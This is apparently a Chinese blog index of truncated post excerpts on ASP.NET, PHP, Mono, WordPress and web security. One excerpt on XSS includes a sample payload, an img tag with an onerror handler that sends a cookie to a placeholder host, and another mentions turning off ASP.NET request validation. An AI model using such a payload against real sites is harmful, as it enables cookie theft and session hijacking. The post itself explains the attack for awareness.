摘要:
一 简介 Asp.net 1.1后默认提供了防范 XSS(跨站脚本攻击) 的能力, 如果发现有风险的html标签 系统会抛出一个 HttpRequestValidationExceptioin 异常, 二 使用 1.可以设置 validateRequest=false 来禁用这个特性, 2.可用如下方法捕获该错误并... 阅读全文
摘要:
谈谈最近优化一个网站项目的经验,首先说一下背景情况: 1) 在页面后台代码中我们把页面上大部分的HTML都使用字符串来拼接生成然后直接赋值给LiteralControl。 2) 网站CPU很高,基本都在80%左右,即使使用了StringBuilder来拼接字符串性能也不理想。 3) 为了改善性能,把整个字符串保存在memcached中,性能还是不理想。 在比较了这个网站和其它网站服务器上相... 阅读全文
摘要:
AppScan是一款很不错的Web安全扫描工具,对于检测网站安全,进行安全稽核审计有很大帮助,从WatchFire Appscan 7.0就开始使用了,一直到现在。 不过任何一款安全扫描工具都存在一些误判,AppScan同样如此。最近在对一家证券公司进行安全评估时候,appscan就出现较多误判,如何剔除误判的条目,就需要你仔细分析appscan给出的Request/Response内容了。 ... 阅读全文
摘要:
XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的HTML代码会被执行,从而达到攻击的特殊目的。 常见的有: 盗取cookie。 最简单的比如提交一个图片"<img src="x" onerror="window.open(http://xxx.com/get... 阅读全文
摘要:
在中国,很多站长都习惯使用Windows系统,对Linux系统则比较陌生。但是在国外,特别是美国这种版权意识非常强烈的国家,90%以上的服务器都是Linux系统。为什么呢?一句话:Linux系统免费,稳定,性能好,而且成本低!在美国主机超市可以找到很多这类的VPS,有兴趣的话可以去这里看看http://www.163er.net/VPS/Linux_VPS.shtml。 在美国,80%的程序员和技... 阅读全文
摘要:
1 什么是设计模式 设计模式是对在软件设计过程中重复出现的问题提出了一种比较好的解决方案。正如一位专家所说:设计模式是对程序设计人员经常遇到的设计问题的可再现的解决方案(The Smalltalk Companion)。GOF设计模式通常被认为是其他设计模式的基础,随着业务复杂度的增大,会不断涌现新的设计模式,而这些新的设计模式一般会以GOF模式理论为参照。 2 为什么要学习设计模式 从个人... 阅读全文
摘要:
声明: 本文是一篇有争议的文章,甚至有可能是一篇争议非常大的文章,可能争来争去依然无法得到一个统一的意见。 场景 个别公司的技术决策者要求团队的开发人员在编写数据访问层的时候,禁止在程序中出现任何的SQL语句,禁止使用Entity Library,禁止使用NBear、NHibernate、IBatis、Entity Framework等ORM框架,只允许使用存储过程。试想一下,您的公司是否是... 阅读全文
摘要:
原文:http://www.cnblogs.com/daylight/archive/2008/10/02/1303037.html 其实就是换mono的公共语言运行时来使用。这样做的好处是体积小,发布免安装。首先,您需要下载mono的最新版(目前是2.0.1)。http://ftp.novell.com/pub/mono/archive/2.0.1/windows-installer/1/mo... 阅读全文
摘要:
当微软把.NET提交到ECMA/ISO成为公开的标准时,就表示.NET已经走向开放,不再只是微软专属的技术。当Mono 1.0正式发布时,也就等于是宣布开放成真了,.NET程序不用被局限在Windows平台上,Mono可以让.NET程序在Windows、Linux、MacOS X、Solaris、BSD等操作系统上面运行,至于硬件平台,Mono也已经支持32-bit和64-bit的x86、Powe... 阅读全文
摘要:
Novell 旗下的 Mono 项目今日发布 2.0 版, 使在 Linux 平台上实现微软 .NET 框架项目获得巨大促进。Mono 2.0 是 Novell 主持的一个开源项目,目标是在 Linux 平台实现微软的 .NET 框架。随着最新的 2.0 版发布,二者之间的差距越来越小。 虽然 Mono 2.0 兼容微软 .NET 2.0,但和微软最新的 .NET 版本并不完全兼容。Mono 的努... 阅读全文
摘要:
先来一张图,这是我的blog今天的统计,我的blogs中,放的都是一些自己平时解决不了问题的,搜索的一些文章,和一些比较经典的文章,大部分都是转载,哈, 所以看的人也少 我的blog的目的也就是,可以随时在自己的blogs中找到自己所要的东西,不需要再次的baidu,google来浪费大量的时间。 ... 阅读全文
摘要:
windows+php+mysql+apache(wamp)安装配置问题 阅读全文
摘要:
做程序开发,离不开好的IDE。微软的Visual Studio一直是.NET平台程序员的必备工具,对于PHP程序员来说都是使用Editplus或PHP Editor等轻量级开发工具。对于编写小的PHP程序还是很不错,但是研究源码最需要是可以调试、跟踪源码,这点显然上述工具就做不到了。我现在主要使用Visual Studio开发ASP.NET应用程序。但是,朋友有一个PHP程序要求帮助开发,所以在网... 阅读全文
摘要:
我最近在 PHP 官网上看到又有新版的 PHP 下载了,于是上去找找 For Windows 的版本,可是一看确傻眼了,一共给了四个版本,VC9 x86 Non Thread Safe、VC9 x86 Thread Safe、VC6 x86 Non Thread Safe、VC6 x86 Thread Safe,这让我这个菜鸟头疼啊,还好 PHP ... 阅读全文
摘要:
装了个VS.Php.for.Visual.Studio.2008的开发工具,这个工具可以在vs的IDE环境下开发调试php程序。因为我的系统是win2008,IIS7对php的支持据说非常的好,可以不需要apache的支持,而且php在II7下的性能据说比apache更好。 装上vs.php后,打开VS,看了一下调试的配置,发现它默认是以apache的方式调试,但我又没装apache,那要怎么样才... 阅读全文
摘要:
vs.php中使用apache或IIS7进行外部调试 1、解决vs.php2.7在Windows7下调试apache出错的问题 vs.php默认使用内部调试模式,由于vs.php2.7默认自带的内部调试的apache和php版本比较低, 在Windows7中运行的时候会产生不兼容的情况,具体表现为apache出错退出,解决办法: 改变安装目录中的apache.exe在兼容模式下运行 我这边是C:... 阅读全文
摘要:
Main features of the plugin: It supports multibyte language (such as Chinese). It will not produce gibberish as some other excerpt plugins do. The html tags in the original posts, i.e., the font style... 阅读全文
摘要:
以下推荐的WordPress SEO插件要有针对性的选择使用,你可千万别一下子全装了。 All in One SEO Pack wordpress平台上最受欢迎的SEO插件之一,该Wordpress 插件可以对全站进行优化,自动生成文章描述和关键词等。利用该插件,你可以给每篇页面添加独立的关键词和摘要,还可以防止存档页面被抓取以免被 Google 降权等等。 补充: 这是wordpress插... 阅读全文
摘要:
wordpress 有丰富的插件、主题,成功广大博主建博客利器,应用非常广泛,已经不仅仅局限于BLOG,很多商业网站、企业网站都是用WordPressg来建立的,WordPress使用的是MySQL数据库,在日常的写作过程中,有时会涉及一些对MySQL数据库的操作,虽然,插件和代码的修改也能帮我们解决问题,但是,这也是治标不治本的丰富,随意,合理的利用phpMyAdmin来进行数据的操作的十分有必... 阅读全文
摘要:
是否有多个博客,每个博客都是使用多个 WordPress 博客?那么你是否厌烦了重复多次的升级,重复多次的安装插件?如果是的,你是否尝试过一个 WordPress 安装,就能给多个博客使用呢?下面我就能讲讲我如何实现一个 WordPress 安装实现多个博客共同使用。 第一步,肯定是把所有的域名都指定到相同的 WordPress 安装目录下。这样才能使得所有博客使用同一个 WordPress 安装... 阅读全文